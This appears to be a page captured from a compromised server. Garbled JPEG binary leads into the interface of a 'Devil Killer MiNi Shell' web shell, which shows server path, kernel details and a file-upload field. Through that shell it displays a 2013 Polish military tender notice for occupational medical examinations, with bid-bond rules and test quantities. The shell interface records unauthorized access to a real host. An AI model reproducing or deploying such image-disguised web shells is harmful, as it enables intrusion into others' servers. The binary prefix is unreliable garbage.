JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130128/36966-N-2013.html

<p class="kh_header"><b>Zamość: Świadczenie usług w zakresie badań profilaktycznych (wstępnych, okresowych, kontrolnych ) dla żołnierzy zawodowych, oraz pracowników cywilnych 32 Wojskowego Oddziału Gospodarczego w Zamościu oraz jednostek  będących na zaopatrzeniu gospodarczym 32 Wojskowego Oddziału Gospodarczego w Zamościu</b><br>
<b>Numer ogłoszenia: 36966 - 2013; data zamieszczenia: 28.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 32 Wojskowy Oddział Gospodarczy w Zamościu , Marszałka Józefa Piłsudskiego 36, 22-400 Zamość, woj. lubelskie, tel. 84 618 15 36, faks 84 618 16 07.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: infrastruktura.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie badań profilaktycznych (wstępnych, okresowych, kontrolnych ) dla żołnierzy zawodowych, oraz pracowników cywilnych 32 Wojskowego Oddziału Gospodarczego w Zamościu oraz jednostek  będących na zaopatrzeniu gospodarczym 32 Wojskowego Oddziału Gospodarczego w Zamościu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: świadczenie usług w zakresie badań profilaktycznych (wstępnych, okresowych, kontrolnych ) dla żołnierzy zawodowych, oraz pracowników cywilnych 32 WOG w Zamościu oraz jednostek  będących na zaopatrzeniu gospodarczym 32 Wojskowego Oddziału Gospodarczego.
Przedmiot zamówienia podzielono na 4 części.
Część Nr 1 - Usługi medyczne dla żołnierzy i pracowników garnizonu Zamość:  JW 5371, JW 3391, Pracownia Psychologiczna , Węzeł Łączności , WKU,  8 kompania rozpoznania radioelektronicznego,  110 prdz Łabunie.
Część Nr 2 - Usługi medyczne dla żołnierzy i pracowników garnizonu Lublin:     JW. 5371- Grupa Zabezpieczenia Lublin i Jawidz,  Dowództwo Wielonarodowej Brygady   ( część polska), Batalion Dowodzenia WB ( część polska), Orkiestra Wojskowa, Żandarmeria Wojskowa, Rejonowy Zarząd Infrastruktury, Delegatura Wojskowej Ochrony p/poż, WKU, Skład Materiałowy Jawidz, , 43 Przedstawicielstwo Wojskowe Świdnik, Wojskowy Sąd Garnizonowy, Prokuratura Garnizonowa, Węzeł Łączności Lublin, Wojskowa Komenda Transportu,, Ośrodek Aktywacji Zawodowej , Wojskowe Biuro Emerytalne, Wojewódzki Sztab Wojskowy, TWKL, Wojskowa Pracownia Psychologiczna, Warsztaty Techniczne, Skłd RBlog Bezwola.
Część Nr 3 - Usługi medyczne dla żołnierzy i pracowników garnizonu Chełm: Grupa Zabezpieczenia Chełm - JW. 5371, WKU, Węzeł Łączności, 1 batalion zmechanizowany, dywizjon artylerii samobieżnej, 35 patrol rozminowania , WKU,
Części Nr 4 - Usługi medyczne dla żołnierzy i pracowników garnizonu Hrubieszów:  JW 5371 Grupa zabezpieczenia - Hrubieszów, 2 Pułk Rozpoznawczy , Węzeł Łączności,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium o niżej wymienionej wartości;
 Część Nr 1 - Usługi medyczne dla żołnierzy i pracowników garnizonu Zamość:  JW 5371, JW 3391, Pracownia Psychologiczna , Węzeł Łączności , WKU,  8 kompania rozpoznania radioelektronicznego,  110 prdz Łabunie
1000,00 zł - (słownie: jeden (1) tysiąc zł.)

Część Nr 2 - Usługi medyczne dla żołnierzy i pracowników garnizonu Lublin:     JW. 5371- Grupa Zabezpieczenia Lublin i Jawidz,  Dowództwo Wielonarodowej Brygady   ( część polska), Batalion Dowodzenia WB ( część polska), Orkiestra Wojskowa, Żandarmeria Wojskowa, Rejonowy Zarząd Infrastruktury, Delegatura Wojskowej Ochrony p/poż, WKU, Skład Materiałowy Jawidz, , 43 Przedstawicielstwo Wojskowe Świdnik, Wojskowy Sąd Garnizonowy, Prokuratura Garnizonowa, Węzeł Łączności Lublin, Wojskowa Komenda Transportu,, Ośrodek Aktywacji Zawodowej , Wojskowe Biuro Emerytalne, Wojewódzki Sztab Wojskowy, TWKL, Wojskowa Pracownia Psychologiczna, Warsztaty Techniczne, Skłd RBlog Bezwola)
1500,00 zł - (słownie: tysiąc pięćset zł)
Część Nr 3 - Usługi medyczne dla żołnierzy i pracowników garnizonu Chełm: Grupa Zabezpieczenia Chełm - JW. 5371, WKU, Węzeł Łączności, 1 batalion zmechanizowany, dywizjon artylerii samobieżnej, 35 patrol rozminowania, WKU
500 zł - (słownie: pięćset zł.)
Część Nr 4 - Usługi medyczne dla żołnierzy i pracowników garnizonu Hrubieszów:  JW 5371 Grupa zabezpieczenia - Hrubieszów, 2 Pułk Rozpoznawczy , Węzeł Łączności, 
300 zł - (słownie: trzysta złotych)

2)	Wadium może być wniesione w jednej lub w kilku następujących formach:
a)	 pieniądzu;
b)	 poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	 gwarancjach bankowych;
d)	 gwarancjach ubezpieczeniowych;
e)	 poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

3)	Wadium w formie pieniężnej należy wpłacić przelewem na rachunek bankowy 32 Wojskowego Oddziału Gospodarczego, ul. Marszałka J. Piłsudskiego 36, 22-400 Zamość, konto nr: 30 1010 1339 0057 5713 9120 0000.
Wadium musi być wniesione najpóźniej do godz. 1300  dnia 06.02.2013 r.
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w wyżej wymienionym terminie znajdzie się na rachunku bankowym 32 Wojskowego Oddziału Gospodarczego w Zamościu.

4)	Wadium w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez podmioty o których mowa w ustawie o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, należy złożyć w formie oryginału w pok. nr 14, budynek 27 w siedzibie 32 Wojskowego Oddziału Gospodarczego, ul. Marszałka J. Piłsudskiego 36, 22-400 Zamość, najpóźniej do godz. 1300  dnia 06.02. 2013 r.
Z treści gwarancji (poręczenia) musi jednoznacznie wynikać jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną  pieczątką lub czytelny (z podaniem imienia i nazwiska).
Z treści gwarancji winno wynikać bezwarunkowe - na każde pisemne żądanie zgłoszone przez  32 Wojskowy Oddział Gospodarczy, ul. Marszałka J. Piłsudskiego 36,  Zamość, w terminie związania ofertą - zobowiązanie Gwaranta do wypłaty 32 Wojskowemu Oddziałowi Gospodarczemu, ul. Marszałka J. Piłsudskiego 36,  Zamość, pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych.
5)	Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
6)	Zamawiający zwraca wadium wszystkim wykonawcom po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy prawo zamówień publicznych.
7)	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
8)	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
9)	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy prawo zamówień publicznych, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 
10)	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
11)	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia  rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
12)	Zamawiający dopuszcza złożenie wadium przez Lidera Konsorcjum w imieniu	 wszystkich     Konsorcjantów.

13)	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do reprezentowania - wykonawców ubiegających się wspólnie -  w  postępowaniu  o  udzielenie  niniejszego zamówienia  lub do  reprezentowania  ich  w  postępowaniu oraz zawarcia umowy na wykonanie przedmiotowego zamówienia publicznego.
2.Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie możliwość zmniejszenia  wynagrodzenia  w sytuacjach  uzasadnionych  ważnymi  powodami,  a  w  szczególności  zmianą stanu  osobowego   Jednostek   Wojskowych  lub  instytucji  znajdującymi  się  na  terenie  miasta a  będących  na  zaopatrzeniu  32 WOG  w Zamościu,  Wykonawcy  nie  przysługują  żadne  roszczenia  w związku ze  zmniejszeniem  ilości  badań medycznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http//:przetarg.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 32 Wojskowy Oddział Gospodarczy,22-400 Zamość, ul. Marszałka J. Piłsudskiego 36, budynek 27, pokój 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.02.2013 godzina 13:00, miejsce: 32 Wojskowy Oddział Gospodarczy w Zamościu, ul. Marszałka J. Piłsudskiego 36, 22-400 Zamość, budynek 33, pokój  33.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część Nr 1 - Usługi medyczne dla żołnierzy i pracowników garnizonu Zamość..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część Nr 1 - Usługi medyczne dla żołnierzy i pracowników garnizonu Zamość:  JW 5371, JW 3391, Pracownia Psychologiczna , Węzeł Łączności , WKU,  8 kompania rozpoznania radioelektronicznego,  110 prdz Łabunie.
Dla części nr 1.
1.	Realizacja usług odbywać się będzie na podstawie imiennych skierowań.
2.	Skierowanie zawierać będzie w szczególności: określenie rodzaju badania profilaktycznego, jakie ma być wykonane, określenie stanowiska pracy, na którym pracownik jest zatrudniony, informacje o występowaniu na stanowisku pracy czynników szkodliwych dla zdrowia lub warunków uciążliwych.
3.	Do podstawowych obowiązków Wykonawcy należeć będzie świadczenie usług z najwyższą starannością, aktualną wiedzą medyczną, dostępnymi metodami i środkami zapobiegania, rozpoznawania i leczenia chorób oraz zasadami etyki zawodowej, respektując prawa pacjenta w szczególności zgodnie z przepisami ustawy z dnia 15.04.2011 r. o działalności leczniczej (Dz. U. Nr 112, poz. 654), przepisami Ustawy z dnia 05.12.1996 r. o zawodach lekarza i lekarza dentysty (Dz. U. z 2008 r. Nr 136 poz. 857 z późn. zm.), przepisami Ustawy z dnia 05.07.1996 r. o zawodach pielęgniarki i położnej (Dz. U. z 2009 r. Nr 151, poz. 1217 z późn. zm.). 
4.	Świadczenia zdrowotne muszą być wykonywane przez personel lekarski, pielęgniarki i inny posiadający odpowiednie kwalifikacje i uprawnienia określone rozporządzeniem ministra Zdrowia i Opieki społecznej z dnia 30 maja 1996 r. w sprawie prowadzenia badan lekarskich pracowników z zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. 1996 r. Nr 69, poz. 332 z późn. zm.).
5.	Wykonawca winien spełniać wymogi zawarte w: ustawie z dnia 27.06.1997 r. o służbie medycyny pracy (Dz. U. z 2004 r., Nr 125, poz. 1317), rozporządzeniu Ministra Zdrowia i Opieki społecznej z dnia 30.05.1996 r. w sprawie przeprowadzenia badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. z 1996 r. Nr 69, poz. 332 z późn. zm.), rozporządzeniu Ministra Zdrowia z dnia 07.01.2004 r. w sprawie badań lekarskich kierowców i osób ubiegających się o uprawnienia kierowania pojazdami (Dz. U. Nr 2, poz. 15), rozporządzeniu Ministra Obrony Narodowej z dnia 09.08.2010r. w sprawie służby medycyny pracy w jednostkach organizacyjnych podległych Ministrowi Obrony Narodowej (Dz. U. z 2010 r. Nr 187, poz. 1257), rozporządzeniu Ministra Obrony Narodowej z dnia 23.12.2010 r. w sprawie niektórych świadczeń zdrowotnych przysługujących żołnierzom zawodowym (Dz.U.2011r, Nr 8, poz. 36). 
6.	Prowadzenie nadzoru dyspanseryzacyjnego oraz niezbędnej dokumentacji zgodnie z Rozporządzeniem Ministra Obrony Narodowej z dnia 23 grudnia 2010 r. w sprawie niektórych świadczeń zdrowotnych przysługujących żołnierzom zawodowym (Dz. U. z 2011 r., Nr 8, poz. 36) ( zał. 15,16,17). 
7.	Gabinety gdzie będą przeprowadzane badania muszą spełniać standardowe wymagania określone w rozporządzeniu Ministra Zdrowia z 10 listopada 2006r w sprawie wymagań, jakie powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia ( Dz. U. z 2006 r, Nr 213, poz.1568 z późn. zm.), a sprzęt medyczny posiadać atesty i dopuszczenia określone przez Ministra Zdrowia.
8.	Wykonawca będzie prowadził rejestr przyjmowanych pacjentów zawierający:
1)	Imię i nazwisko pacjenta,
2)	Nazwisko lekarza przyjmującego,
3)	Datę zgłoszenia się pacjenta i rodzaje udzielonej porady, 
4)	Wyznaczony termin przyjęcia do konsultacji i datę przyjęcia, 
5)	Datę wpisania i inne dane niezbędne dla identyfikacji świadczonych usług wg wymogów przedmiotowej umowy.
9.	Realizacja usług medycznych będzie wykonywana w dni robocze tj. od poniedziałku do piątku, od godz.700 do godz. 1500.
10.	Termin rozpoczęcia i zakończenia badań zaproponowany przez Wykonawcę nie może przekraczać okresu 2 dni roboczych od dnia zgłoszenia się skierowanej osoby.
11.	Badania wstępne i okresowe wykonywane będą w dniu zgłoszenia się skierowanego pracownika Zamawiającego, a zakończone nie później niż następnego dnia roboczego po dniu rozpoczęcia badań.
12.	W przypadku stwierdzenia konieczności wykonania specjalistycznego badania konsultacyjnego lub badania dodatkowego, niezbędnego dla prawidłowej oceny stanu zdrowia osoby przyjmowanej do pracy lub pracownika, termin badanie nie przekroczy 7 dni roboczych.

13.	Wykonawca zapewnia bieżącą realizację usług medycznych, w szczególności dyżur od poniedziałku do piątku lekarza uprawnionego do wykonywania badań profilaktycznych, oraz zastępstwa w razie czasowej nieobecności lekarza  i lekarzy specjalistów. 

14.	W sytuacjach wymagających dodatkowych specjalistycznych badań osób kierowanych Zamawiający uznaje za konieczne przeprowadzenie dodatkowych badań zgodnie z obowiązującymi przepisami.

15.	Badania lekarskie kończą się wydaniem orzeczenia lekarskiego w formie
zaświadczenia stwierdzającego:
1)	Brak przeciwwskazań zdrowotnych do pracy na określonym stanowisku pracy;
2)	Przeciwwskazania zdrowotne do pracy na określonym stanowisku pracy.

16.	Orzeczenie lekarskie otrzymuje bezpośrednio żołnierz lub pracownik wojska, który był badany.

17.	Badanie lekarza orzecznika i wystawienie zaświadczenia do celów sanitarno-epidemiologicznych (w 2 egz. - oryginał i kopia) 

18.	Wykonawca do każdej wystawionej faktury będzie załączał zestawienie zawierające następujące dane:
1)	Nazwiska i Imiona osób przebadanych;
2)	Numery PESEL osób przebadanych;
3)	Nazwę jednostki wojskowej, bądź instytucji;
4)	Datę i rodzaj udzielonych świadczeń;
5)	Podział na pracowników wojska i żołnierzy zawodowych (PW; ŻZ).
6)	Zestawienie musi byś uprzednio potwierdzone pieczątką i podpisem jednostki wojskowej, instytucji   wystawiającej skierowanie na badanie.

19.	Wskazane jest, aby konsultacje i badania dodatkowe odbywały się w tej samej lokalizacji, co gabinet medycyny pracy, bez potrzeby przemieszczania się do innych placówek.

20.	Wykonawca zobowiązany jest do udziału w przeglądzie stanowisk pracy kadry i pracowników wojska, którzy wykonują pracę w warunkach szczególnie szkodliwych dla zdrowia, szczególnie uciążliwych i niebezpiecznych.


21.	Wykonawca po przeprowadzeniu przez specjalistę badań okulistycznych i po stwierdzeniu konieczności stosowania przez pracownika okularów korygujących wzrok przy obsłudze monitora ekranowego musi udokumentować konieczność korekcji wady wzroku, stosownym zaświadczeniem.
22.	TERMIN WYKONANIA ZAMÓWIENIA
Okres obowiązywania umowy: od daty podpisania umowy do 31.12.2013r

	ZAKRES BADAŃ: 

DO CZĘŚCI NR 1.

BADANIA LABORATORYJNE
		



			
Lp	Rodzaj Badania	JM	Przewidywana Ilość badań
1	MORFOLOGIA 	szt.	780
2	OB.	szt.	780
3	GLUKOZA	szt.	780
4	CHOLESTEROL	szt.	780
5	LDL	szt.	780               
6	HDL	szt.	780
7	TG	szt.	550
8	ASPAT	szt.	150
9	ALAT	szt.	150
10	BILIRUBINA CAŁKOWITA	szt.	100
11	KREATYNINA	szt.	50
12	MOCZNIK	szt.	50
13	CRP	szt.	30
14	GGTP	szt.	50
15	VDRL	szt.	10
16	HBsAG	szt.	10
17	JONOGRAM	szt.	10
18	HCV	szt.	10
19	KAŁ NA NOSICIELSTWO X 3 PRÓBY	szt.	10
20	KOPROPORFIRYNA W MOCZU	szt.	20
21	MOCZ BADANIE OGÓLNE	szt.	780
	




	

BADANIA DODATKOWE	
		
Lp	Rodzaj Badania	JM	Przewidywana Ilość badań
1	RTG KRĘGOSŁUPA SZYJNEGO	szt .	10
2	RTG KRĘGOSŁUPA PIERSIOWEGO (DWIE PROJEKCJE)	szt .	10
3	RTG KRĘGOSŁUPA LĘDŹWIOWO KRZYŻOWEGO (DWIE PROJEKCJE)	szt .	10
4	RTG KLATKI PIERSIOWEJ +OPIS	szt.	                  570
	KONSULTACJE   SPECJALISTYCZNE		
			
Lp	Rodzaj Badania	JM	Przewidywana Ilość badań
			
1	KONSULTACJA OKULISTYCZNA	szt.	390
